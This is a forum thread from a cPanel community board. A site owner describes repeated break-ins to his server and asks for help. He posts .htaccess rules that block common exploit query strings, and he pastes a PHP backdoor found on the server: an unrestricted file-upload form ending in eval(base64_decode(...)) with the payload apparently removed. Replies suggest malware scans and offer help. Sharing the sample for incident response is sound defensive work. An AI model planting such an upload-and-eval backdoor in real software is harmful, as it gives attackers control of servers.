The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help, Palestinien Hacker is hell bent on taking me down

Discussion in 'General Discussion' started by ericinne, Oct 8, 2010.

  1. ericinne

    ericinne Registered

    Joined:
    Oct 8, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    This guy keeps getting control of my cPanel on my server.

    He's been able to modify my SQL tables, delete files, change index, lock me out of cPanel, Block my I.P. range, and etc, etc..

    I changed my passwords all to 25 character alphanumeric, I inserted the following into my .htaccess:

    PHP:
    ########## Begin - Rewrite rules to block out some common exploits
    #                             
    # Block out any script trying to set a mosConfig value through the URL
    RewriteCond %{QUERY_STRINGmosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
    # Block out any script trying to base64_encode crap to send via URL
    RewriteCond %{QUERY_STRINGbase64_encode.*(.*) [OR]
    # Block out any script that includes a <script> tag in URL
    RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
    # Block out any script trying to set a PHP GLOBALS variable via URL
    RewriteCond %{QUERY_STRINGGLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
    # Block out any script trying to modify a _REQUEST variable via URL
    RewriteCond %{QUERY_STRING_REQUEST(=|[|%[0-9A-Z]{0,2})
    # Send all blocked request to homepage with 403 Forbidden error!
    RewriteRule ^(.*)$ index.php [F,L]
    #
    ########## End - Rewrite rules to block out some common exploits 
    I had PhPBB do an audit and they found no problems, my host is useless and keeps telling me to scan my PC for viruses (yeah right).

    But still this guy keeps getting in.

    The first time, he used a c99.php shell exploit, but I'm pretty sure I have that hole fixed.

    The second time I noticed an added user name for the ftp account. Deleted it. But he is still getting in.

    Today as I got home, I checked, and noticed I was locked out of the site via I.P. block from the cPanel.

    That was the 4th time.

    I need someone to give me some SERIOUS help here keeping this guy out.

    He's part of the Gaza Hacker crew and has threatened to keep hacking me for insulting Islam of all things.
     
  2. ericinne

    ericinne Registered

    Joined:
    Oct 8, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    If it helps, I discovered the following file on my home dir:

    PHP:
    <html>

    <head>
      <title>beleberda</title>
    </head>

    <body>
    <?php


     
    if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
    if(
    $_FILES['userfile']['tmp_name'][0]!=''){
        for(
    $i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++){
        
    $uploaddir dirname(__FILE__);//'/var/www/uploads/';
        
    $uploadfile $uploaddir .'/'basename($_FILES['userfile']['name'][$i]);
        print 
    "<pre>";
        if (
    move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
           print 
    "File is valid, and was successfully uploaded. ";
           
    //print_r($_FILES);
        
    } else {
           print 
    "Possible fie upload attack!  Here's some debugging info:\n";
           
    //print_r($_FILES);
        
    }
        print 
    "</pre>";
        }
    }
    $connection="killedbase64code";

    echo eval(
    base64_decode($connection));
    ?>
    <form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles?>" method="post" enctype="multipart/form-data">
      Send beleberda:<br>
      <?php for($i=0;$i<$Nfiles;$i++){echo '<input name="userfile[]" type="file"><br>';}?>
      <input type="submit" value="Send files">
    </form>


    </body>

    </html>
     
    #2 ericinne, Oct 8, 2010
    Last edited by a moderator: Oct 8, 2010
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,478
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:

    This is sound advice and I agree with it. If your computer is infected somehow, every time you change your password and then login to your account, he may be receiving that new password from you.

    If you've already scanned and seem to be clean, scan again with an online scanner. Install /http://www.malwarebytes.org/ update it, and then do a full scan with it as well.



    Welcome to the WWW. Insulting others can get you in trouble here the same way it can get you in trouble at your local bar.
    The Core Rules of Netiquette

    If you're not sure that your server is secure, you might want to seek advice from a professional.
     
  4. elialum

    elialum Member

    Joined:
    Sep 10, 2008
    Messages:
    23
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Israel
    cPanel Access Level:
    DataCenter Provider
    Hi,

    I will be glad to help you (free of charge).
    How can I contact you? Can you PM me your details?

    Take care,
    Eli Alum,
    Jerusalem, Israel.
     
Loading...

Share This Page